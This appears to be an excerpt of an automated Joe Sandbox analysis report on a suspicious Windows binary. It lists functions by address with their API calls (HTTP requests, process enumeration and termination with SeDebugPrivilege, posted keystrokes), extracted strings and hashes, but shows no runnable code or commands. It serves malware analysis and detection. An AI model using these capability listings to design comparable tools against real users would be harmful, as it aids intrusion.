                                                                                                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1241431887-3916222277
                                                                                                                      • Opcode ID: 4f94e934c2f103931675d91af98082f781e7c9652181865a2469b3aba80f469d
                                                                                                                      • Instruction ID: 7752061732324af9f137a3674eeb5c85df088729cb3bfc057064eded453709d9
                                                                                                                      • Opcode Fuzzy Hash: 4f94e934c2f103931675d91af98082f781e7c9652181865a2469b3aba80f469d
                                                                                                                      • Instruction Fuzzy Hash: 52417EB1A01618BFEB129F60CD89FFB77ACEF48354F10412AFB019A191E7749D458BA4
                                                                                                                      Function 00408DD5 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00408DF4
                                                                                                                      • GetWindowLongW.USER32(00F39310,000000F0), ref: 00408E27
                                                                                                                      • GetWindowLongW.USER32(00F39310,000000F0), ref: 00408E5C
                                                                                                                      • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00408E8E
                                                                                                                      • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00408EB8
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00408EC9
                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408EE3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LongWindow$MessageSend
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 2178440468-2594219639
                                                                                                                      • Opcode ID: 4baf71920bebebba5af0d450190bb820df5cb66107f755c0a52c58ac80ac851e
                                                                                                                      • Instruction ID: 4eb4a595d396e91f252fce5aec8f1ad2e64f669f94080d65322e976f157076ee
                                                                                                                      • Opcode Fuzzy Hash: 4baf71920bebebba5af0d450190bb820df5cb66107f755c0a52c58ac80ac851e
                                                                                                                      • Instruction Fuzzy Hash: 0F312331600210AFDB209F58DD84F5637A5EB8A354F18017AF585DB2F2CBB5A841CB89
                                                                                                                      Function 003FBAE6 Relevance: 13.9, APIs: 9, Instructions: 419COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0043DBF0), ref: 003FBBA1
                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0043DBF0), ref: 003FBBD5
                                                                                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 003FBD33
                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 003FBD5D
                                                                                                                      • StringFromGUID2.COMBASE(?,?,00000028), ref: 003FBEAD
                                                                                                                      • ProgIDFromCLSID.COMBASE(?,?), ref: 003FBEF7
                                                                                                                      • CoTaskMemFree.COMBASE(?), ref: 003FBF14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 793797124-0
                                                                                                                      • Opcode ID: 8d0560c2fc6576d78799a7bcbfc63ea3c938264c62d5e1c7604a8ade6a2d8b53
                                                                                                                      • Instruction ID: 2c2f20c6629c5c634b2297820ca848b386f5f647629acde998fc1d0c5d8b4968
                                                                                                                      • Opcode Fuzzy Hash: 8d0560c2fc6576d78799a7bcbfc63ea3c938264c62d5e1c7604a8ade6a2d8b53
                                                                                                                      • Instruction Fuzzy Hash: B3F10BB5A00209EFCB15DFA4C884EBEB7B9FF89314F158499FA15AB250DB31AD41CB50
                                                                                                                      Function 003BB86E Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A49CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,003A4954,00000000), ref: 003A4A23
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,003BB85B), ref: 003BB926
                                                                                                                      • KillTimer.USER32(00000000,?,00000000,?,?,?,?,003BB85B,00000000,?,?,003BAF1E,?,?), ref: 003BB9BD
                                                                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 0041E775
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0041E7EB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2402799130-0
                                                                                                                      • Opcode ID: 5dc175278a8544e86fbf287aefdaa06f66967a4a60ac5b5bc422daef39991bd6
                                                                                                                      • Instruction ID: 2ef5ed267a9b818001c9af0b931e6084ed376cb785d7aaebc9ca8ef5361ee1f1
                                                                                                                      • Opcode Fuzzy Hash: 5dc175278a8544e86fbf287aefdaa06f66967a4a60ac5b5bc422daef39991bd6
                                                                                                                      • Instruction Fuzzy Hash: 4861D334500701CFD736AF16D888BAAB7F5FF85319F14452AE69287A70CBF4A891CB49
                                                                                                                      Function 003BF6B5 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0041E9A0,00000004,00000000,00000000), ref: 003BF737
                                                                                                                      • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0041E9A0,00000004,00000000,00000000), ref: 003BF77E
                                                                                                                      • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0041E9A0,00000004,00000000,00000000), ref: 0041EB55
                                                                                                                      • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0041E9A0,00000004,00000000,00000000), ref: 0041EBC1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ShowWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1268545403-0
                                                                                                                      • Opcode ID: d9c13b3fab5fe5bcac70f3536dfb508caccd1e8450fd33721db9097aafe9155d
                                                                                                                      • Instruction ID: 7fa628a0e1100240add81713607a7e9e822eb8ddd985d96b5867bf56ce0298f5
                                                                                                                      • Opcode Fuzzy Hash: d9c13b3fab5fe5bcac70f3536dfb508caccd1e8450fd33721db9097aafe9155d
                                                                                                                      • Instruction Fuzzy Hash: 1941A1307086809ED73747398CCA7F67795AB4134DF6924BEE24742D61CE74E881C715
                                                                                                                      Function 003DCDE6 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003DE138: GetWindowThreadProcessId.USER32(?,00000000), ref: 003DE158
                                                                                                                        • Part of subcall function 003DE138: GetCurrentThreadId.KERNEL32 ref: 003DE15F
                                                                                                                        • Part of subcall function 003DE138: AttachThreadInput.USER32(00000000,?,003DCDFB,?,00000001), ref: 003DE166
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 003DCE06
                                                                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003DCE23
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 003DCE26
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 003DCE2F
                                                                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 003DCE4D
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003DCE50
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 003DCE59
                                                                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 003DCE70
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003DCE73
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2014098862-0
                                                                                                                      • Opcode ID: 38b7647346c122336d657b211f2ceeed815538301f93bbd33bd0612b733bed33
                                                                                                                      • Instruction ID: 98d2e8d4f7e12f1c3aa6082471eea7cacfde67ebd078180cd8312fda3da1ec08
                                                                                                                      • Opcode Fuzzy Hash: 38b7647346c122336d657b211f2ceeed815538301f93bbd33bd0612b733bed33
                                                                                                                      • Instruction Fuzzy Hash: 4811E5B1E50618BEF7212B609C8EF6A3F2DDB08755F500426F2406B1E0CAF25C11DAA8
                                                                                                                      Function 003FC604 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003DA857: CLSIDFromProgID.COMBASE ref: 003DA874
                                                                                                                        • Part of subcall function 003DA857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 003DA88F
                                                                                                                        • Part of subcall function 003DA857: lstrcmpiW.KERNEL32(?,00000000), ref: 003DA89D
                                                                                                                        • Part of subcall function 003DA857: CoTaskMemFree.COMBASE(00000000), ref: 003DA8AD
                                                                                                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 003FC6AD
                                                                                                                      • _memset.LIBCMT ref: 003FC6BA
                                                                                                                      • _memset.LIBCMT ref: 003FC7D8
                                                                                                                      • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 003FC804
                                                                                                                      • CoTaskMemFree.COMBASE(?), ref: 003FC80F
                                                                                                                      Strings
                                                                                                                      • NULL Pointer assignment, xrefs: 003FC85D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                      • String ID: NULL Pointer assignment
                                                                                                                      • API String ID: 1300414916-2785691316
                                                                                                                      • Opcode ID: 8e5bb391b4a0fd5e6e0d6b591167e538d7b84129528f14752d05e8181230b8fd
                                                                                                                      • Instruction ID: 640b54e4fdee6f36f1fddb3f51dca14ee94f39ac083b18f81b4a46cb640fa3ce
                                                                                                                      • Opcode Fuzzy Hash: 8e5bb391b4a0fd5e6e0d6b591167e538d7b84129528f14752d05e8181230b8fd
                                                                                                                      • Instruction Fuzzy Hash: B4913871D0021CABDB12DFA4DD81EEEBBB9EF09750F20412AF515AB281DB705A45CFA0
                                                                                                                      Function 00401AD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 163processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00401B09
                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00401B17
                                                                                                                      • __wsplitpath.LIBCMT ref: 00401B45
                                                                                                                        • Part of subcall function 003C297D: __wsplitpath_helper.LIBCMT ref: 003C29BD
                                                                                                                      • _wcscat.LIBCMT ref: 00401B5A
                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00401BD0
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00401BE2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                      • String ID: hEE
                                                                                                                      • API String ID: 1380811348-842878421
                                                                                                                      • Opcode ID: 08f072be7c9e5daedd1981fb802772052e8d5fa6c73f3f2aecbf6bae471180a1
                                                                                                                      • Instruction ID: 6be8c2c1da06b41c4c41768f9c7d7ebff53fe5b52bf9e6d60f2f119b403530b5
                                                                                                                      • Opcode Fuzzy Hash: 08f072be7c9e5daedd1981fb802772052e8d5fa6c73f3f2aecbf6bae471180a1
                                                                                                                      • Instruction Fuzzy Hash: 885182715043009FD721DF20C885EABB7E8EF89754F40492EF585DB291EB70E904CBA6
                                                                                                                      Function 00401620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003E6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003E6F7D
                                                                                                                        • Part of subcall function 003E6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 003E6F8D
                                                                                                                        • Part of subcall function 003E6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 003E7022
                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0040168B
                                                                                                                      • GetLastError.KERNEL32 ref: 0040169E
                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004016CA
                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00401746
                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 00401751
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00401786
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                      • API String ID: 2533919879-2896544425
                                                                                                                      • Opcode ID: aa0c83ab2cc09967d9874ecf2f9188ab0ed9b59a207d5e60b8769a4f981f15d1
                                                                                                                      • Instruction ID: c8feff1ef1236ec3f8b585b622de2ec06824a75d2539987b28f71f08beb450e5
                                                                                                                      • Opcode Fuzzy Hash: aa0c83ab2cc09967d9874ecf2f9188ab0ed9b59a207d5e60b8769a4f981f15d1
                                                                                                                      • Instruction Fuzzy Hash: 0041B075600201AFDB16EF54CCE2FAEB7A5AF54305F04801AF906AF3E2DB789841CB55
                                                                                                                      Function 0040E1A7 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 108windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ShowWindow.USER32(00461810,00000000,?,?,00461810,00461810,?,0041E2D6), ref: 0040E21B
                                                                                                                      • EnableWindow.USER32(?,00000000), ref: 0040E23F
                                                                                                                      • ShowWindow.USER32(00461810,00000000,?,?,00461810,00461810,?,0041E2D6), ref: 0040E29F
                                                                                                                      • ShowWindow.USER32(?,00000004,?,?,00461810,00461810,?,0041E2D6), ref: 0040E2B1
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 0040E2D5
                                                                                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0040E2F8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 642888154-2594219639
                                                                                                                      • Opcode ID: 05663a30ff7de2483a0e4a5c3f6a7be274411a8d1b1062f18fc2c55510c1b75a
                                                                                                                      • Instruction ID: 9493573e204c2e410920c43a10faf7c11184e6e2a003385d1015c5366f74c058
                                                                                                                      • Opcode Fuzzy Hash: 05663a30ff7de2483a0e4a5c3f6a7be274411a8d1b1062f18fc2c55510c1b75a
                                                                                                                      • Instruction Fuzzy Hash: 92419D70604140EFDB26CF25C499B957BE5BB0A304F1845FEEA48AF2E2C735E852CB55
                                                                                                                      Function 003E6237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 003E62D6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconLoad
                                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                                      • API String ID: 2457776203-404129466
                                                                                                                      • Opcode ID: e0fd28faf8d5722d4c36e9c6ba2866d2374489d2eee2016407d0fad34de994c0
                                                                                                                      • Instruction ID: b01552d1daec7992d049ff8d4579f3459570f8ff3dd60f807387c58284854e95
                                                                                                                      • Opcode Fuzzy Hash: e0fd28faf8d5722d4c36e9c6ba2866d2374489d2eee2016407d0fad34de994c0
                                                                                                                      • Instruction Fuzzy Hash: 35113D312083A2BAD7135B55DC53EAA739C9F263A5B20052EF600BA6C3F7A56E00466C
                                                                                                                      Function 003E757B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 003E7595
                                                                                                                      • LoadStringW.USER32(00000000), ref: 003E759C
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 003E75B2
                                                                                                                      • LoadStringW.USER32(00000000), ref: 003E75B9
                                                                                                                      • _wprintf.LIBCMT ref: 003E75DF
                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003E75FD
                                                                                                                      Strings
                                                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 003E75DA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                      • API String ID: 3648134473-3128320259
                                                                                                                      • Opcode ID: 5cfb3566f44868a178abdee4c64a405e17ce9b1b01ff536f6813822466ec2505
                                                                                                                      • Instruction ID: c4669c21757b3ac1a3ab39d1388af60f9aa99a7798ab868ff648a4de1a9dd965
                                                                                                                      • Opcode Fuzzy Hash: 5cfb3566f44868a178abdee4c64a405e17ce9b1b01ff536f6813822466ec2505
